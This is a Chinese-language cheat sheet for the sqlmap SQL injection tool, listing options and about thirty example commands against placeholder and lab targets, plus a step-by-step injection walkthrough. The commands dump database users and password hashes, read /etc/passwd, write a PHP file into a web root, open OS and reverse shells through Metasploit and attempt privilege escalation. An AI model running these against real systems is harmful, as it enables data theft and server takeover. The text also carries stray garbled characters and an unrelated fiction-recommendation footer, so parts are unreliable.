SQLMAP使用筆記

https://www.feiyusafe.cn/2019/02/26/sqlmap%e4%b8%aa%e4%ba%ba%e6%80%bb%e7%bb%93/

-u #注入點

-f #指紋判別數(shù)據(jù)庫類型 -b #獲取數(shù)據(jù)庫版本信息

-p #指定可測試的參數(shù)(?page=1&id=2 -p "page,id")

-D"" #指定數(shù)據(jù)庫名

-T"" #指定表名 -C"" #指定字段

-s"" #保存注入過程到一個文件,還可中斷,下次恢復(fù)在注入(保存:-s "xx.log"

恢復(fù):-s "xx.log" --resume)

--level=(1-5)#要執(zhí)行的測試水平等級拨拓,默認(rèn)為 1

--risk=(0-3) #測試執(zhí)行的風(fēng)險等級肴颊,默認(rèn)為 1

--time-sec=(2,5)#延遲響應(yīng),默認(rèn)為 5

--data#通過 POST 發(fā)送數(shù)據(jù)

--columns #列出字段

--current-user #獲取當(dāng)前用戶名稱

--current-db #獲取當(dāng)前數(shù)據(jù)庫名稱

--users #列數(shù)據(jù)庫所有用戶

--passwords #數(shù)據(jù)庫用戶所有密碼

--privileges #查看用戶權(quán)限(--privileges -U root)

-U #指定數(shù)據(jù)庫用戶

--dbs #列出所有數(shù)據(jù)庫

--tables -D"" #列出指定數(shù)據(jù)庫中的表

--columns -T"user"-D"mysql" #列出 mysql 數(shù)據(jù)庫中的 us er 表的所有字段

- -dump - all #列出所有數(shù)據(jù)庫所有表

--exclude-sysdbs #只列出用戶自己新建的數(shù)據(jù)庫和表

--dump -T""-D""- C"" #列出指定數(shù)據(jù)庫的表的字段的數(shù)據(jù)(--dump -T users -D

master -C surname)

--dump -T""-D""--start 2 --top4 # 列出指定數(shù)據(jù)庫的表的 2-4 字段的數(shù)據(jù)

--dbms # 指 定 數(shù) 據(jù) 庫 (MySQL,Oracle,PostgreSQL,Microsoft SQL

Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)

--os #指定系統(tǒng)(Linux,Windows)

-v #詳細的等級(0-6)

0:只顯示 Python 的回溯渣磷,錯誤和關(guān)鍵消息婿着。

1:顯示信息和警告消息。

2:顯示調(diào)試消息醋界。 3:有效載荷注入竟宋。

4:顯示 HTTP 請求。

5:顯示 HTTP 響應(yīng)頭形纺。

6:顯示 HTTP 響應(yīng)頁面的內(nèi)容 --privileges #查看權(quán)限

--is-dba #是否是數(shù)據(jù)庫管理員 --roles #枚舉數(shù)據(jù)庫用戶角色

--udf-inject #導(dǎo)入用戶自定義函數(shù)(獲取系統(tǒng)權(quán)限)

--union-check #是否支持 unio n 注入

--union-cols#union 查詢表記錄

--union-test#union 語句測試

--union-use #采用 unio n 注入

--union-tech orderby#union 配合 order by

--data""#POST 方式提交數(shù)據(jù)(--data "page=1&id=2")

--cookie" 用 ; 號 分 開 " #cookie 注 入

(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)

--referer"" #使用 referer 欺騙(--referer "http://www.baidu.com")

--user-agent"" #自定義 user-agent

--proxy"http://127.0.0.1:8118"#代理注入

--string="" #指定關(guān)鍵詞,字符串匹配.--threads #采用多線程(--threads 3)

--sql-shell #執(zhí)行指定 sql 命令

--sql-query # 執(zhí) 行 指 定 的 sql 語 句 (--sql-query "SELECT password FROM

mysql.user WHERE user = 'root' LIMIT 0, 1" )--file-read #讀取指定文件

--file -write #寫入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;

將本地的 test.txt 文件寫入到目標(biāo)的 1.txt)

--file-dest #要寫入的文件絕對路徑 --os-cmd=id #執(zhí)行系統(tǒng)命令

--os-shell #系統(tǒng)交互 shell

--os-pwn #反彈 shell(--os-pwn --msf-path=/opt/framework/msf3/)

--msf-path= #matesploit 絕對路徑(--msf-path=/opt/framework/msf3/)

--os-smbrelay #

--os-bof #

--reg-read #讀取 win 系統(tǒng)注冊表

--priv-esc #

--time-sec= #延遲設(shè)置 默認(rèn)--time-sec=5 為 5 秒

-p"user-agent"--user-agent"sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" # 指 定

user-agent 注入

--eta #盲注

/pentest/database/sqlmap/txt/common-columns.txt 字段字典 common-outputs.txtcommon-tables.txt 表字典 keywords.txt

oracle-default-passwords.txt

user-agents.txt

wordlist.txt

常用語句

1.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db

--users--passwords --dbs -v0

2.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --passwords -U root

--union-use -v2

3.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -Tusers-C username -D

userdb --start 2 --stop 3 -v2

4.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --dump -C"user,pass" -v 1

--exclude-sysdbs

5.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --sql-shell -v2

6.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-read"c:\boot.ini"-v2

7.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --file-write/test/test.txt

--file-dest/var/www/html/1.txt -v2

8.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-cmd"id"-v1

9.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-shell --union-use -v2

10.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn

--msf-path=/opt/framework/msf3--priv-esc -v1

11.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn

--msf-path=/opt/framework/msf3-v1

12.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-bof

--msf-path=/opt/framework/msf3-v1

13.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --reg-add

--reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap"--reg-value=Test

--reg-type=REG_SZ --reg-data=1

14.

./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --eta

15.

./sqlmap.py

- u"http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1"-pid--prefix"')"--s

uffix"AND ('abc'='abc"

16.

./sqlmap.py

- u"http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1"--auth-typeBasic

--auth-cred"testuser:testpass"

17.

./sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

18.

./sqlmap.py - u"http://192.168.136.131/sqlmap/mysql/get_int.php?id=1"--tamper

tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v3

19.

./sqlmap.py

- u"http://192.168.136.131/sqlmap/mssql/get_int.php?id=1"--sql-query"SELECT

'foo'"-v1

20.

./sqlmap.py -u"http://192.168.136.129/mysql/get_int_4.php?id=1"--common-tables

-D testdb --banner

21.

./sqlmap.py

- u"http://192.168.136.129/mysql/get_int_4.php?id=1"--cookie="PHPSESSID=mvijoc

bglq6pi463rlgk1e4v52; security=low"--string='xx'--dbs --level=3 -p"uid "

簡單的注入流程

1.讀取數(shù)據(jù)庫版本丘侠,當(dāng)前用戶,當(dāng)前數(shù)據(jù)庫

sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v1 2.判斷當(dāng)前數(shù)據(jù)庫用戶權(quán)限

sqlmap -u http://www.xxxxx.com/test.php?p=2 --privileges -U 用戶名 -v1

sqlmap -u http://www.xxxxx.com/test.php?p=2 --is-dba -U 用戶名 -v1

3.讀取所有數(shù)據(jù)庫用戶或指定數(shù)據(jù)庫用戶的密碼

sqlmap -u http://www.xxxxx.com/test.php?p=2 --users--passwords -v2

sqlmap -u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v2

4.獲取所有數(shù)據(jù)庫

sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v2 5.獲取指定數(shù)據(jù)庫中的所有表

sqlmap -u http://www.xxxxx.com/test.php?p=2 --tables -D mys ql -v2 6.獲取指定數(shù)據(jù)庫名中指定表的字段

sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -Tusers-v2 7.獲取指定數(shù)據(jù)庫名中指定表中指定字段的數(shù)據(jù)

sqlmap -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql

-Tusers-C"username,password"-s"sqlnmapdb.log"-v2

8.file-read 讀取 web 文件

sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read"/etc/passwd"-v29.file-write 寫入文件到 web

sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write/localhost/mm.php

--file-dest/var/www/html/xx.php -v2

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末逐样,一起剝皮案震驚了整個濱河市蜗字,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌官研,老刑警劉巖秽澳,帶你破解...
    沈念sama閱讀 218,525評論 6 507
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異戏羽,居然都是意外死亡担神,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,203評論 3 395
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門始花,熙熙樓的掌柜王于貴愁眉苦臉地迎上來妄讯,“玉大人,你說我怎么就攤上這事酷宵『ッ常” “怎么了?”我有些...
    開封第一講書人閱讀 164,862評論 0 354
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵浇垦,是天一觀的道長炕置。 經(jīng)常有香客問我,道長,這世上最難降的妖魔是什么朴摊? 我笑而不...
    開封第一講書人閱讀 58,728評論 1 294
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任默垄,我火速辦了婚禮,結(jié)果婚禮上甚纲,老公的妹妹穿的比我還像新娘口锭。我一直安慰自己,他們只是感情好介杆,可當(dāng)我...
    茶點故事閱讀 67,743評論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布鹃操。 她就那樣靜靜地躺著,像睡著了一般春哨。 火紅的嫁衣襯著肌膚如雪荆隘。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,590評論 1 305
  • 城市分裂傳說
    那天悲靴,我揣著相機與錄音臭胜,去河邊找鬼。 笑死癞尚,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的乱陡。 我是一名探鬼主播浇揩,決...
    沈念sama閱讀 40,330評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼憨颠!你這毒婦竟也來了胳徽?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,244評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤爽彤,失蹤者是張志新(化名)和其女友劉穎养盗,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體适篙,經(jīng)...
    沈念sama閱讀 45,693評論 1 314
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡往核,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,885評論 3 336
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了嚷节。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片聂儒。...
    茶點故事閱讀 40,001評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖硫痰,靈堂內(nèi)的尸體忽然破棺而出衩婚,到底是詐尸還是另有隱情,我是刑警寧澤效斑,帶...
    沈念sama閱讀 35,723評論 5 346
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布非春,位于F島的核電站,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏奇昙。R本人自食惡果不足惜护侮,卻給世界環(huán)境...
    茶點故事閱讀 41,343評論 3 330
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望敬矩。 院中可真熱鬧概行,春花似錦、人聲如沸弧岳。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,919評論 0 22
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽禽炬。三九已至涧卵,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間腹尖,已是汗流浹背柳恐。 一陣腳步聲響...
    開封第一講書人閱讀 33,042評論 1 270
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留热幔,地道東北人乐设。 一個月前我還...
    沈念sama閱讀 48,191評論 3 370
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像绎巨,于是被迫代替她去往敵國和親近尚。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,955評論 2 355

推薦閱讀更多精彩內(nèi)容